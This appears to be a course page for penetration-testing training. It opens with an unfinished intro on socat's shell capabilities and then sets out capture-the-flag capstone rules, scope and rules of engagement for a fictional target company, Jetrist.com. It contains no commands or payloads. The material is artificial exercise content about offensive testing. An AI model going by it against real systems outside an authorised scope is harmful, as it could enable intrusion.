We have over the years seen the re-implementation of simple dumb socket servers like netcat. Over the years the tool has proved as useful as almost any penetration testing tool. What is not commonly seen used, however, and is albeit more powerful, is socat. This tool allows you to manipulate traffic in many more ways than netcat, and at times in a simpler manner, without having to worry about building pipe files or FIFO files. It can also provide full working shells, and shells over avenues we may not have considered before, like a named pipe.
This lab shows us two features that are valuable in a Red Team exercise:
Additional Resources
Brief Intro
Today there is no instructions, hence there is no real PowerPoint Lab Presentation.
The flow for today
We have our capstone event today. You will be working in groups of three to five; no fewer than three, no more than five people. Today's Capture the Flag event is designed to model a real-world penetration test. Notably missing from this day is a scoreboard, so let's go over some rules.
Teams of no more than three to five individuals
Overall Project.
Jetrist.com is a startup that works with influencers in designing 'faux' extravagant adventures to help them boost their social media presence. Jetrist.com would like you, the individual teams of testers, to find vulnerabilities in the system that may expose sensitive client data. What data? Any data that links clients to their service, as this could affect both the Jetrist company and the social media influencers by exposing the truth. What truth? Jetrist.com makes it appear as though influencers live the most lavish lifestyle possible, of course.
Your job is to try and find all the vulnerabilities in the environment that could lead to full compromise.
First, the 'flags' in the environment are hints that will be shown to you on exploitation of a service. These 'flags' will provide you both guidance to look further as well as serve as the signposts of successfully completing a challenge.
Secondly, you will need to allot from 45 minutes to an hour to construct a report. The report can be created using LibreOffice Impress or any PowerPoint/Google Slides that you have; the instructor will choose the top three reports and make a determination of which team has created the best presentation.
Flags will all be called flag. Flags will provide one of two things:
1. HINTS
2. KEYS or KEY MATERIAL
How do I find flags?
The flags can be either:
1. Files called flag
2. Files called flag.extension, i.e. flag.exe, flag.html, etc.
3. Database records called flag
4. Database keys called flag
5. Other items that you can search for with the word flag, starting from / or C:\.
Hints
Build this report AS you hack. Don't wait till the end. Make sure to be creative.
We will end this competition at 1:00 and presentations will run from 1:30 to 2:30.
Scope
1. The only domain, and associated subdomains, that are in scope for today is jetrist.com and any of its associated subdomains. blessed-duck.jetrist.com is the only VALID subdomain to use.
3. The web applications, the VPC environments, the databases, and virtual machines are all in scope.
4. The services in a shared remote database environment can be tested, but you cannot extract data that does not belong to jetrist.com.
5. Container registries that are private are in scope, as are any source code repositories.
Rules of Engagement:
1. Web applications and network compute environments for this domain are in scope.
2. You must not bring down production systems, but you can install software.
3. You can read keys but not change them.
4. Do not add root keys.
5. Do not delete any flags.
6. Password brute forcing is in scope IF you construct a wordlist and a very structured attempt; do not attempt 50,000 passwords on an account.
7. No Denial of Service attacks.
8. No performance-hogging attacks.
Bug Bounty
If you find a vulnerability in the class you may submit it for a Bug Bounty, but this should not be the focus for the day. If you find an actual vulnerability in a cloud provider that you feel should be reported, you should attempt to do this.
Any Questions?
You may begin!